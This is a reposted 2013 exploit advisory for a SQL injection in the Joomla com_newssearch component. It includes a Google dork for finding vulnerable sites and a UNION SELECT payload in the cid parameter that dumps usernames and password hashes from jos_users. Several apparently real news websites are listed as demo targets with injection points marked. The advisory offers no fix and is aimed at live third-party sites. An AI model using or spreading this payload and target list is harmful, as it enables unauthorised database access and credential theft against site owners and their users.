Joomla Components com_newssearch SQL Injection

2013-07-06 13:58:16 7 1110
########
# Exploit Title: Joomla Components com_newssearch SQL Injection Vulnerability
# Author: Cloudx
# Facebook Profile: [url]www.fb.me/cloudmrx[/url]
# Web Site : [url]www.tifa-team.com[/url]
# Category:: webapps
# Google Dork: inurl:"com_newssearch" & "cid="
# platform : php
# Vendor: None
# Download : Search Here > [url]http://extensions.joomla.org/[/url] <
# Version: All versions
# Security Risk : High
# Tested on: [Windows 8  64bit ]
########
  
========================

1)Vulnerability Description
2)Exploit
3)Real.Demo
  

1)Vulnerability Description
===========================
  
U can inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database.
Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password.
With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.
  
2)Exploit
=========
  
http://Localhost/{Path}/index.php?option=com_newssearch&type=list&section=1&cid=-1

Exploit .demo
=========
[url]http://www.ainsworthnews.com/index.php?option=com_newssearch&type=list&section=1&cid=-null+union+select+1[/url],1,group_concat(username,0x3a,password)+from+jos_users--+Cloudx

[~] P0c [~] :
============
  
Vuln file in :
  
http://Localhost/{Path}/index.php?option=com_newssearch&type=list&section=1&cid=[Number]  <<-----|
  
[~] D3m0 [~] :
=============
  
[url]http://www.ainsworthnews.com/index.php?option=com_newssearch&type=list&section=1&cid=25[/url][Inj3ct Here]
[url]http://www.hebronjournalregister.com/index.php?option=com_newssearch&type=list&section=1&cid=22[/url][Inj3ct Here]
[url]http://www.wpnews.com/index.php?option=com_newssearch&type=list&section=1&cid=28[/url][Inj3ct Here]
  
  
Many Websites are Affected On SQL inJection
.
.
.
  
####
  
=================================**TIFA-Team**===============================================
# Greets To :
        TIFA-Team & Palestine <3 & Syria <3 & Dr.Freedom & **All Muslims**
                TIFA --> T = This , I = Is , F = For , A = Allah  
=============================================================================================
原文地址:http://www.1337day.com/exploit/20970

关于作者

评论7次

要评论?请先  登录  或  注册